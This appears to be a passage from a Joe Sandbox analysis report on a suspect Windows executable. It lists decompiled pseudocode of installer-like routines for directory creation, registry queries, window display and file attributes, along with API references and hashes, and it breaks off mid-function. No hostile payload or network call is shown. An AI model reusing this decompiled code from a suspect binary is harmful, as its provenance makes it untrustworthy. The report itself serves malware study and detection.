					E00406507(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 1cd0b2e927c8f2ecfe34984a16faff9310db89cb10556e45c9539d2a776eb697
Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
Opcode Fuzzy Hash: 1cd0b2e927c8f2ecfe34984a16faff9310db89cb10556e45c9539d2a776eb697
Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E0040644E(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x0040252f
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 10809b343d35a09ed4d96718a4a5e9c1cb6ac202104faef84ed6f9d8dfa477dc
Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
Opcode Fuzzy Hash: 10809b343d35a09ed4d96718a4a5e9c1cb6ac202104faef84ed6f9d8dfa477dc
Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42920c =  *0x42920c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040563C Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040563C(signed int __eax) {
				struct HWND__* _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42a248;
				_t10 =  *0x42a24c;
				__imp__OleInitialize(0); // executed
				 *0x42a2e0 =  *0x42a2e0 | __eax;
				E004044AF(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x818;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x42a2ac =  *0x42a2ac + 1;
				}
				L7:
				E004044AF(0x404);
				__imp__OleUninitialize();
				return  *0x42a2ac;
			}

0x0040563d
0x00405644
0x0040564c
0x00405652
0x0040565a
0x00405661
0x00405663
0x00405666
0x00405666
0x0040566b
0x00000000
0x00000000
0x0040567c
0x00405684
0x00000000
0x00000000
0x00405686
0x00000000
0x00405684
0x00405688
0x00405688
0x0040568e
0x00405693
0x00405698
0x004056a5

APIs

OleInitialize.OLE32(00000000), ref: 0040564C

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

OleUninitialize.OLE32(00000404,00000000,?,00000000,?), ref: 00405698

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 140fa6264d81b82be0f57579ab09ac984e5fc0a146ecb1030cf4c806b2c00349
Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
Opcode Fuzzy Hash: 140fa6264d81b82be0f57579ab09ac984e5fc0a146ecb1030cf4c806b2c00349
Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x4291f0;
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x429204;
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402c2d
0x00402c39

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e027a523010e746c982d1ba4070572c7783dce6ca0a52e109b03b6d5e4f907e7
Instruction ID: 0bd1c2541dc6badd11bf791eeeb1c61969952e167bd25157246a8193e9c71b51
Opcode Fuzzy Hash: e027a523010e746c982d1ba4070572c7783dce6ca0a52e109b03b6d5e4f907e7
Instruction Fuzzy Hash: C1E02632B00104EBCB14DFA8EDC086E73A5FB44310310483FE502B3290D6749C01CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068D4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406864(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004068dc
0x004068df
0x004068e6
0x004068ee
0x004068fa
0x00000000
0x00406901
0x004068f1
0x004068f8
0x00000000
0x00406909
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
GetProcAddress.KERNEL32(00000000,?), ref: 00406901

Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05 Relevance: 3.0, APIs: 2, Instructions: 21
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C05(signed int __eax) {
				RECT* _t10;
				void* _t16;

				SendMessageW( *(_t16 - 8), 0xb,  *0x425708 & __eax, _t10); // executed
				if( *((intOrPtr*)(_t16 - 0x30)) != _t10) {
					InvalidateRect( *(_t16 - 8), _t10, _t10);
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00402c14
0x00402c1d
0x00402c24
0x00402c24
0x00402c2d
0x00402c39

APIs

SendMessageW.USER32(?,0000000B,?), ref: 00402C14
InvalidateRect.USER32(?), ref: 00402C24

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID:
API String ID: 909852535-0
Opcode ID: d33419e91bae9b3dc09a0268fd640e139a72997e68fc10e20a1bd3dab651079b
Instruction ID: 5d06d3db9ebdc20fb085111a80a7421945f3272c8e7f14f2d46d8925ba4bfc91
Opcode Fuzzy Hash: d33419e91bae9b3dc09a0268fd640e139a72997e68fc10e20a1bd3dab651079b
Instruction Fuzzy Hash: 0FE0EC72710508FFEB11CBA4EE85DAEB7B9FB44355F00057AF602A11A0D7754D51DA28

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405ffb
0x00406008
0x0040601d
0x00406023

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\3GJ6S3Kwnb.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FD2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405fd7
0x00405fdd
0x00405fe2
0x00405feb
0x00405feb
0x00405ff4

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AB5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405abb
0x00405ac3
0x00000000
0x00405ac9
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
GetLastError.KERNEL32 ref: 00405AC9

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 73332B98 Relevance: 1.6, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E73332B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

